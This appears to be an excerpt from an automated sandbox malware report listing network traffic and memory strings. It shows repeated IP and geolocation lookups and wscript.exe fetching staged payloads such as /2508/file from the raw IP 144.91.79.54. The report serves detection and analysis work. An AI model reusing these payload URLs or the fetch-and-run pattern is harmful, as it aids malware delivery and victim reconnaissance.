                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49726 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49758 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: unknownTCP traffic detected without corresponding DNS query: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /2508/s HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /2508/r HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/v HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET /2508/file HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 144.91.79.54
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324272341.0000000005761000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2330493341.000000000576E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2311543486.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329957807.00000000030F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txt
                  Source: wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtb
                  Source: wscript.exe, 00000003.00000003.2327596611.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file
                  Source: wscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/file0F?
                  Source: wscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/filewF
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/r
                  Source: wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/s
                  Source: wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327347198.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327470587.00000000051A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2321571179.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329992171.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327265308.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2313721636.00000000030F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324169500.0000000000B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/2508/v
                  Source: wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/4
                  Source: wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/;
                  Source: wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54/M
                  Source: wscript.exe, 00000003.00000003.2303245791.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.91.79.54:80/2508/s
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: doc1.exe, bosotkm.exe.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: svchost.exe, 00000035.00000002.3463466912.000001E75A800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                  Source: qmgr.db.53.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
